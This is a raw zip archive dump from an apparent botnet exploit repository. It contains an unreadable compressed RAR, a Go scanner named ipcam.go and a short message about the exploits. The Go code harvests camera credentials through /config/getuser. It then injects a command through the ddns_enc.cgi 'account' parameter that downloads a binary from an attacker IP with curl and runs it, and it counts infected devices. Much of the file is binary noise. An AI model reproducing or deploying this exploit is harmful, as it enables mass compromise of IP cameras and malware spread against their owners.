Path: blob/master/Botnets/Exploits/0days_skida.zip
5038 views
PK���,!Q�����
�������#�0days skida/OemExploit.rarup �2��0days skida/OemExploit.rarRar!����
������ϼo-
��) (��OemExploit/oem.go
ŕr��ʔ
0�D336�Xu��x>�E�"����B9Ci�#F؉K�iEjl�Q&���$~��|�ބJm�h�_
M��s������x����7�0
���>O�%߆?����<�MB
P^��48�TIn<��F�͟J
��
�1���&
�F��p�A$|�jɼ���87������������A�^ݦg�����yn� ݇ow�D���>
��x~�+F"�څ`x�����Xr��L�tP��ym0��y�g@�(1������{����� ����X�>��+F��>r�<���8��G�O�Y!�&P�nDd����~1��r�{�(� S
�t9��~�&cׄG�Y� &�$"�|��
�.P�<�"��1or06��d:�c�%
�
hV�C��Y.e��
h���
O�<��*�4} �Fx�@����r��@�@rm���ߝ����ސ#�U"q Տ�T�������H��T}���z��8��
A>n��(�g����jDU踬�$!�i��U�� ��
51��8��<����]�q��[z�0O�
r�h�F��2U
��B��G4��
�S�'^�S�H�W-+�LB�E˄
��x~��T9^ =?����}7�,]\#k_
��q���g`z�^i_�̐�
\���e`(��B�����脶��<���A
��t�J ~1k�2�WG@pɔ��o��lRH0fN��ʝ��$��շ
�����I�!����H�YHMҧ/���"��`
g��A{�1�f�Փ�m3��$��I~��'�s4J��x�|n���.����u��z%�~����7
�dS!ådH��;D�+���
��Y��&�LeGV�����������B�r�O�A\_�����w���Y��3bL�SG/�3��7�wcgζ
{{+���ۛ��|�����������s_g��L��t�8����^鱩�S4Iy�|Eֈ<��L/�
��A��q"��#�dqq�� �������Nj���
�
ލ��F���|¤���u�2��)*���4v������(x�4��=U���(K�
����
X9>2&�NPq��=�!�1Q�9;�ޜ��+;���=�c*����H�]e�Մ�J�="F��{H�Aj���\d �Յ�M�{��O�|� �9쒚
�;�"����-Q ��ؘ������IuI�s�e���]j��lP�^Ψ�K���h��K^���O�0��Iŕ!��t
�7\�Nb�BեU����m��k�e�Zp�=������/F��Żh��j�KVJ���e;Ub `�ҩ�Uس�m��]��<
�c@��Ϥ��ϵ����)�"���}���Q��t<hg�K,���������=V�s-�,��
<�?%����}+�j�WJ
!� W�ךU������l�\��'x�_�Q
�<�t���ʟ�hL0a�Ͻ5��C�V��U���ˍ����d'�ӕj�:zU3-
�Blg�eX
��������ys<��j�HYF_cFN���C-|�@[K�;!_�W�^u߽Dt��f�tv���
��݈�p��QK}
X��-�o�}��
h��u��N�8�����`B�s.�^�Xʜ���q�}W�'�RVv\��
�2�Q�1�k���ov���]�3�\8Z���q
�������z�+[ɳ�<�Uݑ�� \��z� Upyn���ѷOU����cB�����6�oc�����|zu�E������P"����n�� ���j<m#��4���\�x,�/)
G�:NL��#
��^�&�#�9$��ϔ���/�c/�^ �˯@��z(�<�+��@�
����[�}��4���<m�R0����cS�=���-��o������y�Y���~Cp�UF��e�'Y��T����{�maf�����^�0�
˽(�r4E���~QW֑�g\����·u^F�hZʀP�,tt�3��Z>o���f���S+��V�#�W-�u���Esw=4d�2h �m����ut�J�}٪�l��|*NU�b����7 �d}"\W����,ܯ�R�X�]�:71l��|��P ]�S
j&.淪�1
^% B6k�2
��
����OemExploit/oemshell.go
�̐*���*�6433�Pd�%@[S����I�b��;E�(��h@"k��
x����\�1��u$� n��t��
'_ ��wIӺt�F~H �Ħqc|�q.�#�Y�&WY�#����1#���g*)�H�@�pN�
��#<R��Vܺ��wj6���a\hi�k����� Pؕ H�
r�t����)�J�]�I�F�21XS��:��uviMxE�}�UF���wnK���
cy�����xܙb�J��Z
D��rAU�
S���
c��X|��U�}C/\��6�ϋ��u EH�,�G���G�p�;�
��Nc�<���
V6O�;�3
E0�_��Q��K��;��e�B|j��MY`�R[�b*�&�,�$nd
� �O?/1�TF9���Y����_is �W���
��%3Ð����犝�T�{=S��ߏ�`+�a��s��Ƒ;ah��-��UJM!���,���""-G���L�����(U_��6���5�U<����|��0�����Uɶ���X/aE�)g�(�d�i l����$���m7�����z��x$O%�p� 2y*�H�z<���.
�K�0f�Mtn���~&����:
�u�{�P�1aHuA��X���B��K���]�nDA����>����d�?��� ���O�3<���/�����c~`y��THjY��̃k^U��]y�wshb�I��~��L�Eg��$
���������
OemExploit
�����
wVQ�PKvJ/�
���
��PK�����"Q����b�������
�0days skida/ipcam.goup����0days skida/ipcam.gopackage main
import (
"net"
"time"
"bufio"
"fmt"
"os"
"sync"
"unicode"
"strings"
"encoding/base64"
)
var statusAttempted, statusLogins, statusFound, statusVuln, statusClean int
var CONNECT_TIMEOUT time.Duration = 30
var READ_TIMEOUT time.Duration = 15
var READ_2_TIMEOUT time.Duration = 5
var WRITE_TIMEOUT time.Duration = 10
var syncWait sync.WaitGroup
var payload string = "curl%20 PUT YOUR IP HERE WITHOUT SPACES%2FBINS NAME HERE WITHOUT SPACES%3Bsh%20 BINS NAME HERE WITHOUT SPACES"
func zeroByte(a []byte) {
for i := 0; i < len(a); i++ {
a[i] = 0x00
}
}
func stipByte(a []byte) {
for i := 0; i < len(a); i++ {
if a[i] == 0x0D || a[i] == 0x0A {
a[i] = 0x00
}
}
}
func setWriteTimeout(conn net.Conn, timeout time.Duration) {
conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))
}
func setReadTimeout(conn net.Conn, timeout time.Duration) {
conn.SetReadDeadline(time.Now().Add(timeout * time.Second))
}
func getStringInBetween(str string, start string, end string) (result string) {
s := strings.Index(str, start)
if s == -1 {
return
}
s += len(start)
e := strings.Index(str, end)
if (s > 0 && e > s + 1) {
return str[s:e]
} else {
return "null"
}
}
func processTarget(target string) {
statusAttempted++
conn, err := net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
if err != nil {
syncWait.Done()
return
}
setWriteTimeout(conn, WRITE_TIMEOUT)
conn.Write([]byte("GET /config/getuser?index=0 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"))
setReadTimeout(conn, READ_TIMEOUT)
bytebuf := make([]byte, 512)
l, err := conn.Read(bytebuf)
if err != nil || l <= 0 {
zeroByte(bytebuf)
conn.Close()
syncWait.Done()
return
}
stipByte(bytebuf)
conn.Close()
if strings.Contains(string(bytebuf), "name=") && strings.Contains(string(bytebuf), "pass=") && strings.Contains(string(bytebuf), "priv=") {
statusFound++
} else {
zeroByte(bytebuf)
syncWait.Done()
return
}
usernameIn := getStringInBetween(string(bytebuf), "name=", "pass=")
passwordIn := getStringInBetween(string(bytebuf), "pass=", "priv=")
username := strings.Map(func(r rune) rune {
if unicode.IsGraphic(r) {
return r
}
return -1
}, usernameIn)
password := strings.Map(func(r rune) rune {
if unicode.IsGraphic(r) {
return r
}
return -1
}, passwordIn)
if len(username) <= 0 || len(password) <= 0 {
zeroByte(bytebuf)
syncWait.Done()
return
} else {
zeroByte(bytebuf)
statusLogins++
}
b64auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password))
conn, err = net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
if err != nil {
syncWait.Done()
return
}
setWriteTimeout(conn, WRITE_TIMEOUT)
conn.Write([]byte("GET /cgi-bin/ddns_enc.cgi?enable=1&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=;" + payload + "; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Basic " + b64auth + "\r\n\r\n"))
setReadTimeout(conn, READ_TIMEOUT)
l, err = conn.Read(bytebuf)
if err != nil || l <= 0 {
zeroByte(bytebuf)
conn.Close()
syncWait.Done()
return
}
conn.Close()
time.Sleep(15 * time.Second)
conn, err = net.DialTimeout("tcp", target, CONNECT_TIMEOUT * time.Second)
if err != nil {
syncWait.Done()
return
}
setWriteTimeout(conn, WRITE_TIMEOUT)
conn.Write([]byte("GET /cgi-bin/ddns_enc.cgi?enable=0&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=aaaa HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Basic " + b64auth + "\r\n\r\n"))
setReadTimeout(conn, READ_TIMEOUT)
l, err = conn.Read(bytebuf)
if err != nil || l <= 0 {
zeroByte(bytebuf)
conn.Close()
syncWait.Done()
return
}
if strings.Contains(string(bytebuf), "service=www.dlinkddns.com") {
statusVuln++
}
conn.Close()
syncWait.Done()
return
}
func main() {
var i int = 0
if (len(os.Args) != 2) {
fmt.Println("[Scanner] Missing argument (port/listen)")
return
}
go func() {
i = 0
for {
fmt.Printf("%d's | Total %d | Device Found: %d | Authenticated: %d | Payload Sent: %d\r\n", i, statusAttempted, statusFound, statusLogins, statusVuln)
time.Sleep(1 * time.Second)
i++
}
} ()
for {
r := bufio.NewReader(os.Stdin)
scan := bufio.NewScanner(r)
for scan.Scan() {
if os.Args[1] == "listen" {
go processTarget(scan.Text())
} else {
go processTarget(scan.Text() + ":" + os.Args[1])
}
syncWait.Add(1)
}
}
}
PK��1b��b��PK���D #Q������������ �0days skida/message.txtup
�D$�r0days skida/message.txtThis video is about some exploit bullshit thats been going around and also a 0day i was scammed for
[?] INFO ABOUT EXPLOITS [?]
#oem/oemshell# - fake 0day
-This exploit is supposed to effect tvt oem but, was resolved march of 2018
-only older tvt oem are effected but this exploit trys to infect anything with the port open
-it also doesn't infect every device it displays it just says infected if they page has 200 anywhere in it
-which would include if the site displayed an error that has 200 in it EX. nfiuhwqig200fiuhs87
-the method that is trys to inject commands is also resolved so you will not be able to infect devices
mmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmmnmm
nnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnnmnn
#ipcam#
-This exploit uses a pretty well known command line injection method
-getting the devices in bulk is next to impossible without ranges which i never got
-cgi-bin/ddns_enc.cgi is the file it abuses to give you access
-i was givin this one because oem wasn't 0day and it's ass
from - (bleaching)
PK��W�����PK����,!QvJ/�
���
�������������������0days skida/OemExploit.rarPK������"Q��1b��b����������������
��0days skida/ipcam.goPK����D #Q��W�������������������!��0days skida/message.txtPK�����������&����